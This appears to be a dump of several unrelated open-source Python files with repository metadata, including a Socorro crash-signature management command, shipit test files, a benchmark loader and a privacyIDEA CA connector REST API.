        doc['links'] = [Link(*args) for args in doc['links']]
    return data
def config(section, key, memo={}):
    """Read a value from ``config.ini``.

    The file is parsed once; the deliberately-mutable *memo* default caches
    the parser across calls.
    """
    if 'config' not in memo:
        parser = ConfigParser()
        parser.read('config.ini')
        memo['config'] = parser
    return memo['config'].get(section, key)
def get_db():
    """Open a MySQL connection from the ``[db]`` config; return (conn, cursor)."""
    connection = pymysql.connect(config('db', 'host'), config('db', 'user'),
                                 config('db', 'pass'), charset='utf8')
    cursor = connection.cursor()
    return connection, cursor
|
mythmon/sumomo-importer
|
sumomomig/utils.py
|
Python
|
mpl-2.0
| 2,741
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
Maintain Signature data using crash data in Elasticsearch.
"""
import datetime
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from django.utils.dateparse import parse_datetime
from crashstats.crashstats.models import Signature
from crashstats.supersearch.models import SuperSearch
from socorro.external.es.super_search_fields import SuperSearchFieldsData
from socorro.lib.datetimeutil import string_to_datetime
# Maximum number of results Super Search returns per request (page size).
MAX_PAGE = 1000
class Command(BaseCommand):
    help = "Updates the signatures table using crash data from Elasticsearch"

    def add_arguments(self, parser):
        """Register the command's CLI options."""
        parser.add_argument(
            "--last-success",
            default="",
            help=(
                "The start of the window to look at in YYYY-mm-ddTHH:MM format in UTC. "
                "Defaults to run-time value minus 90 minutes."
            ),
        )
        parser.add_argument(
            "--run-time",
            default="",
            help=(
                "The end of the window to look at in YYYY-mm-ddTHH:MM format in UTC. "
                "Defaults to now."
            ),
        )
        parser.add_argument(
            "--dry-run", action="store_true", help="Whether or not to do a dry run."
        )

    def update_crashstats_signature(self, signature, report_date, report_build):
        """Insert or update one Signature row, keeping the earliest build/date seen."""
        report_build = int(report_build)
        report_date = string_to_datetime(report_date)
        try:
            sig = Signature.objects.get(signature=signature)
            # Keep the minimum so first_build/first_date only move backwards.
            sig.first_build = min(report_build, sig.first_build)
            sig.first_date = min(report_date, sig.first_date)
        except Signature.DoesNotExist:
            sig = Signature.objects.create(
                signature=signature, first_build=report_build, first_date=report_date
            )
        sig.save()

    def handle(self, **options):
        """Collect crashes in the time window and upsert their signatures."""
        start_datetime = options.get("last_success")
        end_datetime = options.get("run_time")
        if end_datetime:
            end_datetime = parse_datetime(end_datetime)
        else:
            end_datetime = timezone.now()
        if start_datetime:
            start_datetime = parse_datetime(start_datetime)
            # When run via cronrun, start_datetime is based on the last success
            # and we want to increase the window by 10 minutes to get some
            # overlap with the previous run
            start_datetime = start_datetime - datetime.timedelta(minutes=10)
        else:
            # Default to end_datetime - 90 minutes
            start_datetime = end_datetime - datetime.timedelta(minutes=90)
        # Truncate seconds and microseconds
        start_datetime = start_datetime.replace(second=0, microsecond=0)
        end_datetime = end_datetime.replace(second=0, microsecond=0)
        if not end_datetime > start_datetime:
            raise CommandError("start time must be before end time.")
        # Do a super search and get the signature, buildid, and date processed for
        # every crash in the range
        all_fields = SuperSearchFieldsData().get()
        api = SuperSearch()
        self.stdout.write("Looking at %s to %s" % (start_datetime, end_datetime))
        params = {
            "date": [
                f">={start_datetime.isoformat()}",
                f"<{end_datetime.isoformat()}",
            ],
            "_columns": ["signature", "build_id", "date"],
            "_facets_size": 0,
            "_fields": all_fields,
            # Set up first page
            "_results_offset": 0,
            "_results_number": MAX_PAGE,
        }
        # Accumulates, per signature, the earliest build_id and date seen.
        results = {}
        crashids_count = 0
        while True:
            resp = api.get(**params)
            hits = resp["hits"]
            for hit in hits:
                crashids_count += 1
                if not hit["build_id"]:
                    # Not all crashes have a build id, so skip the ones that don't.
                    continue
                if hit["signature"] in results:
                    data = results[hit["signature"]]
                    data["build_id"] = min(data["build_id"], hit["build_id"])
                    data["date"] = min(data["date"], hit["date"])
                else:
                    data = {
                        "signature": hit["signature"],
                        "build_id": hit["build_id"],
                        "date": hit["date"],
                    }
                    results[hit["signature"]] = data
            # If there are no more crash ids to get, we return
            total = resp["total"]
            if not hits or crashids_count >= total:
                break
            # Get the next page, but only as many results as we need
            params["_results_offset"] += MAX_PAGE
            params["_results_number"] = min(
                # MAX_PAGE is the maximum we can request
                MAX_PAGE,
                # The number of results Super Search can return to us that it hasn't returned so far
                total - crashids_count,
            )
        signature_data = results.values()
        # Save signature data to the db
        for item in signature_data:
            if options["dry_run"]:
                self.stdout.write(
                    "Inserting/updating signature (%s, %s, %s)"
                    % (item["signature"], item["date"], item["build_id"])
                )
            else:
                self.update_crashstats_signature(
                    signature=item["signature"],
                    report_date=item["date"],
                    report_build=item["build_id"],
                )
        self.stdout.write("Inserted/updated %d signatures." % len(signature_data))
|
lonnen/socorro
|
webapp-django/crashstats/crashstats/management/commands/updatesignatures.py
|
Python
|
mpl-2.0
| 5,999
|
import json
def test_patch_status(client, bugs, header_bot):
    """
    Posting a patch status stores it on the bug and records the merge result.
    """
    from shipit_uplift.models import BugResult
    url = '/bugs/1139560/patches'
    revision = '80c32af73390'  # existing patch revision
    branch = 'test'

    # The bug payload starts with the patch but no merge result.
    bug_record = BugResult.query.filter_by(bugzilla_id=1139560).one()
    patch_map = bug_record.payload_data['analysis']['patches']
    assert revision in patch_map
    assert 'merge' not in patch_map[revision]

    # No patch statuses exist yet.
    response = client.get(url, headers=[
        ('Authorization', header_bot),
    ])
    assert response.status_code == 200
    assert json.loads(response.data.decode('utf-8')) == []

    # Create one patch status.
    new_status = {
        'group': 1,
        'revision': revision,
        'revision_parent': '0000001',
        'branch': branch,
        'status': 'failed',
        'message': 'random mercurial error',
    }
    response = client.post(url, data=json.dumps(new_status), headers=[
        ('Authorization', header_bot),
        ('Content-Type', 'application/json'),
    ])
    assert response.status_code == 200

    # The bug now exposes exactly one patch status.
    response = client.get(url, headers=[
        ('Authorization', header_bot),
    ])
    assert response.status_code == 200
    assert len(json.loads(response.data.decode('utf-8'))) == 1

    # The payload records the failed merge for the branch.
    bug_record = BugResult.query.filter_by(bugzilla_id=1139560).one()
    patch_map = bug_record.payload_data['analysis']['patches']
    assert revision in patch_map
    assert 'merge' in patch_map[revision]
    assert patch_map[revision]['merge'] == {
        branch: False,
    }
|
andrei987/services
|
src/shipit_uplift/tests/test_patch_status.py
|
Python
|
mpl-2.0
| 1,729
|
import importlib
import sys
# Make the alltoall problem module ("app") importable by get_model() below.
sys.path.append("modules/problems/alltoall")
''' Temporarily using term "model" to represent some form of "operations"
'''
def get_model(params):
    """Import the benchmark's ``app`` module and build its app for *params*.

    ("model" is a temporary term for the benchmark's set of operations.)
    """
    app_module = importlib.import_module("app")
    return app_module.get_app(params)
|
undertherain/benchmarker
|
benchmarker/kernels/alltoall/openmpi.py
|
Python
|
mpl-2.0
| 264
|
# -*- coding: utf-8 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import responses
import pytest
import json
@responses.activate
def test_conf(mock_config):
    '''
    Test mail reporter configuration
    '''
    from shipit_static_analysis.report.mail import MailReporter

    # A configuration without an 'emails' key must be rejected.
    with pytest.raises(AssertionError):
        MailReporter({}, 'test_tc', 'token_tc')

    # An empty email list must be rejected too.
    with pytest.raises(AssertionError):
        MailReporter({'emails': []}, 'test_tc', 'token_tc')

    # A single valid email is accepted and exposed on the reporter.
    reporter = MailReporter({'emails': ['test@mozilla.com']}, 'test_tc', 'token_tc')
    assert reporter.emails == ['test@mozilla.com', ]

    # Several valid emails are kept, in order.
    many = [
        'test@mozilla.com',
        'test2@mozilla.com',
        'test3@mozilla.com',
    ]
    reporter = MailReporter({'emails': many}, 'test_tc', 'token_tc')
    assert reporter.emails == ['test@mozilla.com', 'test2@mozilla.com', 'test3@mozilla.com']
@responses.activate
def test_mail(mock_issues, mock_phabricator):
    '''
    Test mail sending through Taskcluster
    '''
    from shipit_static_analysis.report.mail import MailReporter
    from shipit_static_analysis.revisions import MozReviewRevision, PhabricatorRevision
    from shipit_static_analysis.report.phabricator import PhabricatorReporter
    # Phabricator reporter only used to build a PhabricatorRevision below.
    phab = PhabricatorReporter({
        'url': 'http://phabricator.test/api/',
        'api_key': 'deadbeef',
    })
    def _check_email(request):
        # Validates the payload posted to the Taskcluster notify service.
        payload = json.loads(request.body)
        assert payload['subject'] in (
            '[test] New Static Analysis MozReview #12345 - 1',
            '[test] New Static Analysis Phabricator #42 - PHID-DIFF-test',
        )
        assert payload['address'] == 'test@mozilla.com'
        assert payload['template'] == 'fullscreen'
        assert payload['content'].startswith('3 Publishable issues on Mozreview')
        return (200, {}, '')  # ack
    # Add mock taskcluster email to check output
    responses.add_callback(
        responses.POST,
        'https://notify.taskcluster.net/v1/email',
        callback=_check_email,
    )
    # Publish email
    conf = {
        'emails': [
            'test@mozilla.com',
        ],
    }
    r = MailReporter(conf, 'test_tc', 'token_tc')
    # Publish for mozreview
    mrev = MozReviewRevision('abcdef:12345:1')
    r.publish(mock_issues, mrev, diff_url=None)
    # Publish for a Phabricator revision as well.
    prev = PhabricatorRevision('42:PHID-DIFF-test', phab)
    r.publish(mock_issues, prev, diff_url=None)
|
srfraser/services
|
src/shipit_static_analysis/tests/test_reporter_mail.py
|
Python
|
mpl-2.0
| 2,723
|
# NOTE(review): DataClassification, PHU and newtypes are not imported here;
# they appear to be injected by the AstroData classification loader before
# this file is exec'd -- TODO confirm.
class UNPREPARED(DataClassification):
    # Protect this classification definition from editing.
    editprotect=True
    name="UNPREPARED"
    usage = 'Applies to un-"prepared" datasets, datasets which have not had the prepare task run on them.'
    parent = "RAW"
    # Matches when no PHU keyword resembling PREPAR* is present.
    requirement= PHU({'{prohibit,re}.*?PREPAR*?': ".*?" })
newtypes.append(UNPREPARED())
|
pyrrho314/recipesystem
|
trunk/dontload-astrodata_Gemini/ADCONFIG_Gemini/classifications/status/gemdtype.UNPREPARED.py
|
Python
|
mpl-2.0
| 301
|
from django.apps import AppConfig
class GroupsConfig(AppConfig):
    """Django application configuration for the ``agir.groups`` app."""
    name = "agir.groups"
|
lafranceinsoumise/api-django
|
agir/groups/apps.py
|
Python
|
agpl-3.0
| 92
|
# -*- coding: utf-8 -*-
#
# 2015-05-15 Cornelius Kölbel <cornelius.koelbel@netknights.it>
# Initial writup
#
# License: AGPLv3
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
__doc__ = """This is the REST API for managing CA connector definitions.
The CA connectors are written to the database table "caconnector".
The code is tested in tests/test_api_caconnector.py.
"""
from flask import (Blueprint, request)
from lib.utils import (send_result)
from ..lib.log import log_with
from flask import g
import logging
from privacyidea.lib.caconnector import (save_caconnector,
delete_caconnector,
get_caconnector_list)
from ..api.lib.prepolicy import prepolicy, check_base_action
from privacyidea.lib.policy import ACTION
from .auth import admin_required
# Module-level logger and the Flask blueprint under which all CA connector
# endpoints below are registered.
log = logging.getLogger(__name__)
caconnector_blueprint = Blueprint('caconnector_blueprint', __name__)
@caconnector_blueprint.route('/<name>', methods=['GET'])
@caconnector_blueprint.route('/', methods=['GET'])
@log_with(log)
#@prepolicy(check_base_action, request, ACTION.CACONNECTORREAD)
def get_caconnector_api(name=None):
    """List CA connector definitions.

    :param name: optional connector name to filter by; all connectors when None
    :return: JSON result; configuration details are included only for admins
    """
    g.audit_object.log({"detail": "{0!s}".format(name)})
    is_admin = g.logged_in_user.get("role") == "admin"
    res = get_caconnector_list(filter_caconnector_name=name,
                               return_config=is_admin)
    g.audit_object.log({"success": True})
    return send_result(res)
@caconnector_blueprint.route('/<name>', methods=['POST'])
@log_with(log)
@prepolicy(check_base_action, request, ACTION.CACONNECTORWRITE)
@admin_required
def save_caconnector_api(name=None):
    """Create or update the CA connector *name* from the request parameters.

    Admin-only; requires the CACONNECTORWRITE policy action.
    """
    params = request.all_data
    params["caconnector"] = name
    g.audit_object.log({"detail": "{0!s}".format(name)})
    result = save_caconnector(params)
    g.audit_object.log({"success": True})
    return send_result(result)
@caconnector_blueprint.route('/<name>', methods=['DELETE'])
@log_with(log)
@prepolicy(check_base_action, request, ACTION.CACONNECTORDELETE)
@admin_required
def delete_caconnector_api(name=None):
    """Delete the CA connector *name*.

    Admin-only; requires the CACONNECTORDELETE policy action.
    """
    g.audit_object.log({"detail": "{0!s}".format(name)})
    result = delete_caconnector(name)
    g.audit_object.log({"success": True})
    return send_result(result)
|
jalr/privacyidea
|
privacyidea/api/caconnector.py
|
Python
|
agpl-3.0
| 3,052
|